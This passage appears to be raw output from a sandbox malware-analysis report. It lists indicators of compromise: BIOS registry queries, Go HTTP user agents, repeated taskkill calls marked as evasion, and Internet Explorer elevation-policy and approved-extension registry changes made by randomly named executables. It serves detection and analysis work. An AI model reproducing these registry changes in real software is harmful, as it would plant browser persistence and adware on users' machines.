Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

GoLang User-Agent 6 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	789	Go-http-client/1.1
HTTP User-Agent header	791	Go-http-client/1.1
HTTP User-Agent header	793	Go-http-client/1.1
HTTP User-Agent header	796	Go-http-client/1.1
HTTP User-Agent header	797	Go-http-client/1.1
HTTP User-Agent header	786	Go-http-client/1.1

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
11396	taskkill.exe
9312	taskkill.exe
13440	taskkill.exe
6984	taskkill.exe
6120	taskkill.exe
17196	taskkill.exe
11120	taskkill.exe
3472	taskkill.exe
7588	taskkill.exe
1516	taskkill.exe
9748	taskkill.exe
9292	taskkill.exe
2324	taskkill.exe
13356	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

Processes:

DNnZcAy.exeMicrosoftEdge.exeSxjcCox.exeQDsgliQ.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	DNnZcAy.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{B7993E1A-469D-4CED-8208-B2E0791F4668} = 51667a6c4c1d3b1b0a2388aaab118b019d00f3a07e5d0a73	DNnZcAy.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}	SxjcCox.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	SxjcCox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{B7993E1A-469D-4CED-8208-B2E0791F4668} = 51667a6c4c1d3b1b0a2388aaab118b019d00f3a07e5d0a73	SxjcCox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	QDsgliQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "eIqwpVq.exe"	QDsgliQ.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "MkWeJlP.exe"	SxjcCox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	QDsgliQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "MkWeJlP.exe"	SxjcCox.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights	SxjcCox.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	SxjcCox.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Approved Extensions	SxjcCox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\eIqwpVq.exe = "9999"	QDsgliQ.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	SxjcCox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{B7993E1A-469D-4CED-8208-B2E0791F4668} = 51667a6c4c1d3b1b0a2388aaab118b019d00f3a07e5d0a73	QDsgliQ.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}	SxjcCox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "eIqwpVq.exe"	QDsgliQ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	QDsgliQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "jjYUVtV.exe"	DNnZcAy.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MkWeJlP.exe = "9999"	SxjcCox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	SxjcCox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\jjYUVtV.exe = "9999"	DNnZcAy.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	QDsgliQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "jjYUVtV.exe"	DNnZcAy.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	SxjcCox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	DNnZcAy.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE"	DNnZcAy.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	DNnZcAy.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

mask_svc.execsrss.exepowershell.exepowershell.exepowershell.exeDrvInst.exeapp.exeSxjcCox.exepowershell.EXEpowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	SxjcCox.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeQDsgliQ.exeMicrosoftEdge.exeMicrosoftEdgeCP.execmd.exeDNnZcAy.exeMicrosoftEdgeCP.exeSxjcCox.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\yjiDqdgnMIE\\"	QDsgliQ.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d4c364d6141cd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\NumberOfSubd = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\ = "{484C7844-4212-4BE0-A3B4-376E9752EB97}"	QDsgliQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\FLAGS\ = "0"	DNnZcAy.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8d9a17d8141cd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	SxjcCox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\suggestive.com\NumberOfSubdom = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "76"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
